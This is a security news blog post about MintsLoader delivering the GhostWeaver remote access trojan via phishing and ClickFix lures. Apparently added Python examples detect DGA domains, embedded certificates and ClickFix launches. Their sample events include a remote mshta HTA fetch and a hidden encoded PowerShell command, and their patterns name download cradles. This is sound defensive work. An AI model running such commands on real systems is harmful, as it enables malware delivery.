Cyber Web Spider Blog – News
MintsLoader Drops GhostWeaver via Phishing, ClickFix — Uses DGA, TLS for Stealth Attacks

Posted on May 2, 2025 (updated May 11, 2025) by CWS

May 02, 2025 | Ravie Lakshmanan | Malware / Threat Intelligence
The malware loader known as MintsLoader has been used to deliver a PowerShell-based remote access trojan called GhostWeaver.
"MintsLoader operates through a multi-stage infection chain involving obfuscated JavaScript and PowerShell scripts," Recorded Future's Insikt Group said in a report shared with The Hacker News.
"The malware employs sandbox and virtual machine evasion techniques, a domain generation algorithm (DGA), and HTTP-based command-and-control (C2) communications."
Phishing and drive-by download campaigns distributing MintsLoader have been detected in the wild since early 2023, per Orange Cyberdefense. The loader has been observed delivering various follow-on payloads, including StealC and a modified version of the Berkeley Open Infrastructure for Network Computing (BOINC) client.

The malware has also been put to use by threat actors operating e-crime services such as SocGholish (aka FakeUpdates) and LandUpdate808 (aka TAG-124), with distribution via phishing emails targeting the industrial, legal, and energy sectors, as well as fake browser update prompts.

In a notable twist, recent attack waves have employed the increasingly prevalent social engineering tactic known as ClickFix to trick website visitors into copying and executing malicious JavaScript and PowerShell code themselves. Links to the ClickFix pages are distributed via spam emails.
"Although MintsLoader functions solely as a loader without supplementary capabilities, its primary strengths lie in its sandbox and virtual machine evasion techniques and a DGA implementation that derives the C2 domain based on the day it's run," Recorded Future said.

These features, coupled with obfuscation, let threat actors hinder analysis and complicate detection. The malware's primary job is to download the next-stage payload over HTTP from a DGA-generated domain by means of a PowerShell script.
GhostWeaver, according to a report from TRAC Labs earlier this February, is designed to maintain persistent communication with its C2 server, generate DGA domains using a fixed-seed algorithm keyed on the week number and year, and deliver additional payloads in the form of plugins that can steal browser data and manipulate HTML content.
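The two date-keyed schedules described above (MintsLoader's per-day domain and GhostWeaver's week-and-year seed) are what let a defender pre-compute the domains a sample will contact. The Python below is an added illustration, not code from the article, Recorded Future or TRAC Labs: the seed constant, alphabet, domain count and TLD list are invented, since neither real algorithm is given here, and the DNS log it runs over is constructed.

```python
import datetime as dt
import hashlib
import random

# Hypothetical constants: stand-ins for a loader's hard-coded seed and TLD list.
SECRET_SEED = "illustrative-fixed-seed"
TLDS = ("top", "xyz", "shop")
DOMAINS_PER_PERIOD = 5


def daily_seed(day: dt.date) -> str:
    """MintsLoader-style: the seed (and so the domain set) changes every calendar day."""
    return f"{SECRET_SEED}|{day.isoformat()}"


def weekly_seed(day: dt.date) -> str:
    """GhostWeaver-style: seed from ISO year and week number, so the set rotates weekly."""
    iso_year, iso_week, _ = day.isocalendar()
    return f"{SECRET_SEED}|{iso_year}|W{iso_week:02d}"


def generate(seed: str, count: int = DOMAINS_PER_PERIOD) -> list[str]:
    """Expand a seed into `count` candidate domains. Malware and defender run the same
    function; only the seed constant has to be recovered from a sample."""
    key = int.from_bytes(hashlib.sha256(seed.encode()).digest()[:8], "big")
    rng = random.Random(key)
    domains = []
    for _ in range(count):
        label = "".join(rng.choice("abcdefghijklmnopqrstuvwxyz")
                        for _ in range(rng.randint(10, 14)))
        domains.append(f"{label}.{rng.choice(TLDS)}")
    return domains


SCHEMES = {"daily": daily_seed, "weekly": weekly_seed}


def classify(day: dt.date, qname: str, slack_days: int = 1):
    """Return (scheme, seed_day) if qname is a DGA domain valid on `day`
    (allowing `slack_days` either side for clock skew), else None."""
    q = qname.lower().rstrip(".")
    for offset in range(-slack_days, slack_days + 1):
        d = day + dt.timedelta(days=offset)
        for name, seed_fn in SCHEMES.items():
            if q in generate(seed_fn(d)):
                return name, d
    return None


def hunt(log_lines: list[str]) -> list[tuple[str, str, str]]:
    """Parse 'YYYY-MM-DD client qname' lines and return (client, qname, scheme) hits."""
    hits = []
    for line in log_lines:
        date_s, client, qname = line.split()
        verdict = classify(dt.date.fromisoformat(date_s), qname)
        if verdict is not None:
            hits.append((client, qname.lower(), verdict[0]))
    return hits


# Constructed DNS log: two queries are planted from the schedules above, one is benign.
DAY = dt.date(2025, 4, 30)
SAMPLE_LOG = [
    f"2025-04-30 10.0.0.12 {generate(daily_seed(DAY))[0]}",
    "2025-04-30 10.0.0.12 www.example.com",
    f"2025-05-01 10.0.0.40 {generate(weekly_seed(DAY))[2]}",   # same ISO week as DAY
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit)
```

The practical difference between the two seeds is lead time: a week-keyed DGA lets a defender enumerate and sinkhole a whole week of domains at once, while a day-keyed one forces block lists to be regenerated daily, which is why the per-day derivation is singled out as the loader's strength.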

"Notably, GhostWeaver can deploy MintsLoader as an additional payload via its sendPlugin command. Communication between GhostWeaver and its command-and-control (C2) server is secured through TLS encryption using an obfuscated, self-signed X.509 certificate embedded directly within the PowerShell script, which is leveraged for client-side authentication to the C2 infrastructure," Recorded Future said.
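An embedded client certificate is a hunting lead: once pulled out of the script, its thumbprint can be matched against certificates seen in TLS handshakes in network telemetry. The Python below is an added example rather than anything from the report. It uses a hand-written DER walker instead of a third-party library, undoes only the simplest obfuscation (PowerShell string concatenation), and fabricates its own sample: the `placeholder-c2` common name, the `fake_cert` encoder and the `SAMPLE_SCRIPT` text are constructed here, not taken from a GhostWeaver sample.

```python
import base64
import hashlib
import re

OID_CN = b"\x55\x04\x03"                       # id-at-commonName (2.5.4.3)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def read_tlv(buf: bytes, pos: int):
    """Return (tag, content_start, content_end) of the DER TLV at `pos`."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                           # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, pos, pos + length


def name_to_str(buf: bytes, start: int, end: int) -> str:
    """Render an X.501 Name (SEQUENCE OF SET OF {OID, value}) as 'CN=...'."""
    parts = []
    pos = start
    while pos < end:
        _, rdn_s, rdn_e = read_tlv(buf, pos)     # SET (one RDN)
        p = rdn_s
        while p < rdn_e:
            _, atv_s, atv_e = read_tlv(buf, p)   # SEQUENCE {type, value}
            _, oid_s, oid_e = read_tlv(buf, atv_s)
            _, val_s, val_e = read_tlv(buf, oid_e)
            label = "CN" if buf[oid_s:oid_e] == OID_CN else buf[oid_s:oid_e].hex()
            parts.append(f"{label}={buf[val_s:val_e].decode('utf-8', 'replace')}")
            p = atv_e
        pos = rdn_e
    return ",".join(parts)


def cert_summary(der: bytes) -> dict:
    """Issuer, subject, issuer==subject check and SHA-256 thumbprint of a DER Certificate.
    Raises ValueError/IndexError on anything not shaped like one."""
    tag, pos, end = read_tlv(der, 0)             # Certificate ::= SEQUENCE {...}
    if tag != 0x30 or end != len(der):
        raise ValueError("not a single DER SEQUENCE")
    tag, pos, _ = read_tlv(der, pos)             # tbsCertificate
    if tag != 0x30:
        raise ValueError("missing tbsCertificate")
    tag, _, nxt = read_tlv(der, pos)
    if tag == 0xA0:                              # optional [0] EXPLICIT version
        pos = nxt
    _, _, pos = read_tlv(der, pos)               # serialNumber
    _, _, pos = read_tlv(der, pos)               # signature AlgorithmIdentifier
    iss_start = pos
    _, iss_s, iss_e = read_tlv(der, pos)         # issuer Name
    _, _, pos = read_tlv(der, iss_e)             # validity
    sub_start = pos
    _, sub_s, sub_e = read_tlv(der, pos)         # subject Name
    return {
        "issuer": name_to_str(der, iss_s, iss_e),
        "subject": name_to_str(der, sub_s, sub_e),
        # Identical encoded issuer and subject is the shape of a self-signed cert; the
        # signature is not verified here, so treat it as a strong hint, not proof.
        "self_signed": der[iss_start:iss_e] == der[sub_start:sub_e],
        "sha256": hashlib.sha256(der).hexdigest(),
    }


def deobfuscate(script: str) -> str:
    """Undo the simplest PowerShell string splitting: 'abc' + 'def' -> 'abcdef'.
    Real loaders layer more on top; this is a first pass only."""
    return re.sub(r"['\"]\s*\+\s*['\"]", "", script)


def find_embedded_certs(script: str) -> list[dict]:
    """Every base64 blob in the script that decodes to something shaped like a DER cert."""
    found = []
    for m in B64_BLOB.finditer(deobfuscate(script)):
        try:
            found.append(cert_summary(base64.b64decode(m.group(0), validate=True)))
        except (ValueError, IndexError):         # binascii.Error is a ValueError
            pass
    return found


# --- constructed sample: a tiny DER encoder builds a self-signed-looking certificate ---
def tlv(tag: int, content: bytes) -> bytes:
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content


def name_cn(cn: str) -> bytes:
    return tlv(0x30, tlv(0x31, tlv(0x30, tlv(0x06, OID_CN) + tlv(0x0C, cn.encode()))))


def fake_cert(issuer_cn: str, subject_cn: str) -> bytes:
    """Structurally valid Certificate with placeholder key and signature bytes (not cryptographically valid)."""
    sha256_rsa = tlv(0x30, tlv(0x06, bytes.fromhex("2a864886f70d01010b")) + tlv(0x05, b""))
    rsa_key = tlv(0x30, tlv(0x06, bytes.fromhex("2a864886f70d010101")) + tlv(0x05, b""))
    tbs = tlv(0x30, tlv(0xA0, tlv(0x02, b"\x02")) + tlv(0x02, b"\x01") + sha256_rsa
              + name_cn(issuer_cn)
              + tlv(0x30, tlv(0x17, b"250101000000Z") + tlv(0x17, b"260101000000Z"))
              + name_cn(subject_cn)
              + tlv(0x30, rsa_key + tlv(0x03, b"\x00" * 17)))
    return tlv(0x30, tbs + sha256_rsa + tlv(0x03, b"\x00" * 33))


_B64 = base64.b64encode(fake_cert("placeholder-c2", "placeholder-c2")).decode()
SAMPLE_SCRIPT = (                                 # constructed, not a real GhostWeaver script
    "$raw = '" + _B64[:60] + "' + '" + _B64[60:] + "'\n"
    "$cert = [System.Security.Cryptography.X509Certificates.X509Certificate2]::new([Convert]::FromBase64String($raw))\n"
)

if __name__ == "__main__":
    for c in find_embedded_certs(SAMPLE_SCRIPT):
        print(c)
```

The thumbprint is the value to pivot on: a self-signed certificate presented by a client (or by the C2 during the handshake) never shows up in any public CA log, so a match in TLS metadata is a high-confidence indicator even when the C2 domain itself rotates with the DGA.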
The disclosure comes as Kroll revealed attempts by threat actors to gain initial access through an ongoing campaign codenamed CLEARFAKE that uses ClickFix to lure victims into running MSHTA commands that ultimately deploy the Lumma Stealer malware.
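ClickFix and CLEARFAKE both end the same way: the user launches mshta.exe or PowerShell from the Run dialog with a command they pasted, which is visible in process-creation telemetry. The following Python triage over Sysmon Event ID 1 style fields (`Image`, `ParentImage`, `CommandLine`) is an added example, not a vendor or Kroll signature; the `SAMPLE_EVENTS`, their hostnames and URLs, the indicator regexes and the scoring threshold are constructed for illustration.

```python
import re

# Interpreters and LOLBins a pasted ClickFix command typically ends up in.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}      # Win+R Run dialog launches children of explorer.exe
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s", re.I)
CRADLE_RE = re.compile(r"\biex\b|invoke-expression|downloadstring|invoke-webrequest|\biwr\b", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score(event: dict) -> tuple[int, list[str]]:
    """Count ClickFix indicators on one process-creation event; 0 means none."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"]
    reasons = []
    if image not in LOLBINS:
        return 0, reasons
    if parent in INTERACTIVE_PARENTS:
        reasons.append("launched from explorer.exe (Run dialog / pasted command)")
    if URL_RE.search(cmd):
        reasons.append("remote URL on the command line")
    if image == "mshta.exe" and URL_RE.search(cmd):
        reasons.append("mshta pulling a remote HTA (CLEARFAKE pattern)")
    if ENCODED_RE.search(cmd):
        reasons.append("encoded PowerShell command")
    if CRADLE_RE.search(cmd):
        reasons.append("download cradle / IEX")
    return len(reasons), reasons


def triage(events: list[dict], threshold: int = 2) -> list[tuple[int, str, list[str]]]:
    """Return (pid, image, reasons) for events carrying at least `threshold` indicators."""
    hits = []
    for ev in events:
        n, reasons = score(ev)
        if n >= threshold:
            hits.append((ev["ProcessId"], basename(ev["Image"]), reasons))
    return hits


# Constructed events using Sysmon Event ID 1 field names; hosts and URLs are placeholders.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://verify-captcha.invalid/check.hta"},
    {"ProcessId": 4188, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -ec QUFBQQ=="},
    {"ProcessId": 5220, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor\Agent.exe",
     "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},          # benign admin job
    {"ProcessId": 5301, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for pid, image, why in triage(SAMPLE_EVENTS):
        print(pid, image, "; ".join(why))
```

An explorer.exe parent on its own is not suspicious (every double-clicked shortcut has one), which is why the threshold requires a second indicator such as a URL or an encoded command; where the telemetry includes the user's `RunMRU` registry values, a matching entry there corroborates that the command came through the Run dialog.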

Tags: Attacks, ClickFix, DGA, Drops, GhostWeaver, MintsLoader, Phishing, Stealth, TLS